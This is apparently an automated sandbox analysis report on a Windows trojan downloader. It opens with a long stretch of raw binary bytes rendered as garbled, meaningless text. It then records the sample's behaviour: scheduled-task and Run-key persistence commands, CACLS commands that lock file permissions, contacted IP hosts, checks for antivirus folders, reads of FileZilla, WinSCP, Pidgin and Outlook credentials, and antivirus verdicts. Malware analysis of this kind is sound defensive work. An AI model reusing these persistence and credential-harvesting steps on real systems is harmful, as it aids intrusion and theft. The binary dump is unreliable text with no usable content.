VUè€ýÿÿ‰ƒ;t#‹Ó¸äµBèõýÿÿ„Àuh€j‹Pèbýÿÿ3À‰]_^[ÐSVWUƒÄì‰L$‰$ÇD$ÿÿÿÿ3҉T$ ‹è‹$ʼnD$‹äµBëQ‹;‹s;îwF‹ÆC ;D$w;;t$s‰t$‹ÆC ;D$ v‰D$ h€jVèïüÿÿ…Àu ÇÀµB‹ÃèŠýÿÿ‹ßûäµBu§‹D$3҉ƒ|$ t‹D$‹T$‰‹D$ +D$‹T$‰BƒÄ]_^[ÃSVWUƒÄô‰L$‰$‹Ð‹êåðÿÿ$Âÿâðÿÿ‰T$‹D$‰(‹D$+ŋT$‰B‹5äµBë<‹^‹~ û;ëv‹Ý;|$v‹|$;ûvjh+ûWSè&üÿÿ…Àu ‹D$3҉ë ‹6þäµBu¼ƒÄ ]_^[ËÀSVWUQ‹Ø‹óÆÿæðÿÿ‰4$‹ëêåðÿÿ‹$‰‹Å+$‰A‹5äµBë8‹^‹~ û;$s‹$;ïs‹ý;ûvh@+ûWSè­ûÿÿ…Àu ÇÀµB‹6þäµBuÀZ]_^[Í@SVWUƒÄø‹ò‹ø½ôµBÇÿ?çÀÿÿ‹]ë3;{ ,‹Î‹×‹Cèºþÿÿƒ>tP‹FC‹F)C ƒ{ u>‹Ãèìûÿÿë5‹;Ýuɋ֋Çè÷üÿÿƒ>t!‹Ì‹Ö‹Åèãûÿÿƒ<$u¥‹Ì‹V‹è±ýÿÿ3À‰YZ]_^[ËÀSVWUƒÄì‰ $‹ú‹ð½ôµBÇÿ?çÀÿÿ‹]ë‹;Ýt;suõ;suW;{ Ž–L$‹×+S ‹CC èÛüÿÿƒ|$t3L$ T$‹Åè]ûÿÿƒ|$ u±L$ ‹T$‹D$è%ýÿÿ‹$3҉鐍L$‹×‹Æè”üÿÿƒ|$t4L$ T$‹Åèûÿÿƒ|$ …fÿÿÿL$ ‹T$‹D$èÚüÿÿ‹$3҉ëH‹k;õu:;{ 5‹ $‹×‹Åèqýÿÿ‹$ƒ8t(‹$‹@C‹$‹@)C ƒ{ u‹Ãèšúÿÿë‹$3҉ƒÄ]_^[ÐSVWƒÄì‹ù‰$˜ÿ?ãÀÿÿ‹4$ðæÀÿÿ;Þs[‹Ï‹Ö+ӋÃè™ýÿÿL$‹×¸ôµBè]úÿÿ‹\$…ÛtL$ ‹T$‹Ãè&üÿÿ‹D$ ‰D$‹D$‰D$ƒ|$tT$¸ôµBè‘úÿÿë3À‰ƒÄ_^[ÃU‹ì3ÒUhf@dÿ2d‰"hĵBè9ùÿÿ€=E°Bt hĵBè.ùÿÿ¸äµBèŒùÿÿ¸ôµBè‚ùÿÿ¸ ¶BèxùÿÿhøjèÜøÿÿ£¶Bƒ=¶Bt/¸‹¶B3ɉL‚ô@=u츶B‰@‰£¶BƼµB3ÀZYYd‰hm@€=E°Bt hĵBè¯øÿÿÃé‰"ëå ¼µB]ÃU‹ìS€=¼µB„Ì3ÒUhJ@dÿ2d‰"€=E°Bt hĵBèføÿÿƼµB¡¶BPè4øÿÿ3À£¶B‹äµBëh€j‹CPè%øÿÿ‹ûäµBuæ¸äµBè‰øÿÿ¸ôµBèøÿÿ¸ ¶Bèuøÿÿ¡ÜµB…Àt‹‰ܵBPèÖ÷ÿÿ¡ÜµB…Àué3ÀZYYd‰hQ@€=E°Bt hĵBèÕ÷ÿÿhĵBèÓ÷ÿÿÃé¥!ëÛ[]ÃS;¶Bu ‹P‰¶B‹P‹Hù8;Âu…ÉyƒÁÁù¡¶B3҉Tˆôë$…ÉyƒÁÁù‹¶B‰T‹ô‹‰‰P[ˉ‰P[Í@‹ ¶Bë‹J;ÁrJ ;Ár‹ú ¶BuèÇÀµB3ҋÂÐS‹Êƒéƒú|Ç€‹Ñè¹[Ãú| ‹ÊÉ€‰‰ [Ãÿ¬µB‹Ðƒê‹âüÿÿƒê°µBèóËÀƒú |ƒÊ‰ƒÀèÊÿÿÿÃú| ‹ÊÉ€‰ƒ þÃSV‹Ðƒê‹‹Êá€ù€t ÇÀµB‹Úãüÿÿ+ËÈ3÷Âþÿÿÿt ÇÀµBöt ‹Ðƒê ‹r+Æ;pt ÇÀµBèŠþÿÿދÃ^[Í@SVW‹Ø3ÿ‹©€t %üÿÿø؋¨u‹ó‹ÆèXþÿÿ‹F
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†-˜“cð& "b! þϝ@ Ìët` ˆÃ£€ÌlÀ¥Ë(ÂpÌÌÀa–(ðX`C1aJ5ApM˜``P`\RPN\q`@€€@PÀo(Mo6,GKÀ« @`@_?i`!m?YЕ@@0@wov<xmg1èà@0@52FZy>L#¼ ð €`À_Mg(F-,0P(!@0À-x&@99zwx0!@@ÀnCk39'8\@!@@À0`p)Yb2J¸’7P! `5&zT1E_"`ðX@Ài4KfTz'oègsYhs`h^lh%B-yOÌpÌ~s@0@rH_N@Ea+l€Ì€s@0ÀÆ]œzЗ.¹e‚g©¶/f¸<›îç—ÀÀ¨*ž@@¥öYfMZìd¤/ &x¤ä Yj–6C›H;]šüŸ¼½ `јbh¤Ò0Yäö¦
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00046a00', u'virtual_address': u'0x00001000', u'entropy': 7.488313592366181, u'name': u'.text', u'virtual_size': u'0x0004690b'} entropy 7.48831359237 description A section with a high entropy has been found
entropy 0.959252971138 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
host 45.159.188.118
host 85.209.135.109
host 89.22.236.225
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Emit64.exe reg_value C:\Users\test22\AppData\Local\Temp\1000017001\Emit64.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\avicapn32.exe reg_value C:\Users\test22\1000018002\avicapn32.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\syncfiles.dll reg_value rundll32 C:\Users\test22\1000019012\syncfiles.dll, rundll
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\umciavi64.exe reg_value C:\Users\test22\AppData\Roaming\1000020000\umciavi64.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\umciavi32.exe reg_value C:\Users\test22\AppData\Roaming\1000021000\umciavi32.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
Bkav W32.AIDetect.malware2
FireEye Generic.mg.45a95da55d4eb1e4
Elastic malicious (moderate confidence)
Kaspersky UDS:Trojan-Downloader.Win32.Deyma.gen
Avast FileRepMalware [Trj]
McAfee-GW-Edition Artemis
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Trojan.Win32.Gen.bot
Microsoft Trojan:Win32/Sabsik.FL.B!ml
McAfee Artemis!45A95DA55D4E
AVG FileRepMalware [Trj]
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
cmdline CACLS "..\03bd543fce" /P "test22:N"
cmdline CACLS "gntuud.exe" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\03bd543fce" /P "test22:N"&&CACLS "..\03bd543fce" /P "test22:R" /E&&Exit
cmdline cmd /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\03bd543fce" /P "test22:N"&&CACLS "..\03bd543fce" /P "test22:R" /E&&Exit
cmdline CACLS "..\03bd543fce" /P "test22:R" /E
cmdline CACLS "gntuud.exe" /P "test22:N"
Time & API Arguments Status Return Repeated

LdrGetProcedureAddress

 ordinal: 0
function_address: 0x010dfc79
function_name: wine_get_version
module: ntdll
module_address: 0x778a0000
3221225785 0